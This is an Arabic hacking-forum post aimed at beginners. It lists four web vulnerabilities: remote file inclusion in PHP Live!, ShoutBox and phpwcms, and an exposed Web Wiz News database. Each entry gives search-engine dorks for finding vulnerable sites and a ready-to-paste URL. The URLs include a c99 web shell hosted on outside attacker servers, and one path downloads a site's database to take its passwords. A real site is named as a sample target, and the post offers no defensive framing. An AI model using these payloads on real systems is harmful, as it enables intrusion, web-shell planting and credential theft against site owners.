۞مكتبة الثغرات۞ للمبتدئين و تدكير للمحتر

1/ نوع الثغرة File include .

------------------------------------------





نروح www.google.com أو www.yahoo.com



واكتب في مربع البحث :



PHP Live! v3.2



وراح يطلع لك مواقع كثيرة



اختار لك واحد منها



واكتب بعد رابط الموقع هالرابط



setup/header.php?css_path=http:/hack15.com/evil/c.txt?



يعني الشكل راح يكون شبيه بهذا :



http://[target]/[path]/setup/header.php?css_path=http://hack15.com/evil/c.txt?



وراح يستعرض لك ملف شيل Ch99



الحين العب في الموقع لعب وقريب بحط شرح كامل عن هالشيل بإذن الله





2/نوع الثغرة ShoutBox

----------------------------------



نروح www.google.com أو www.yahoo.com



واكتب في مربع البحث : ShoutBox

واعمل بحث راح تطلع لك مواقع كثير اكتب بعد رابط أي موقع



هذا الرابط :



sb/index.php?sb_include_path=http://hack15.com/evil/c.txt?



مثال بسيط :



http://www.site.com/[path]/sb/index.php?sb_include_path=http://hack15.com/evil/c.txt?



3/نوع الثغرةweb wiz news

-----------------------------------------



اول شي تروح www.google.com



وتكتب powered by web wiz news



وبعدين دور لك واحد مثلا http://www.obedienceuk.com/news/



وتضيف على الرابط هاذا الرابط /news.mdb



وبعدين تنزل القاعده وتحصل فيها الباسوورددددددد



4/ثغرة من ثغرات الفلود انكلود

---------------------------------------------



نفتح جوجل نكتب فيه

inurl:"phpwcms/index.php?id="



نختر واحد من المواقع الا مصابة

وبعدها نضع هذا الربط



phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://crash.cabspace.com/phpshell/ch992.txt?



الان هذا موقع مصاب

والان رفعت الشل دوم الاخترقت يارب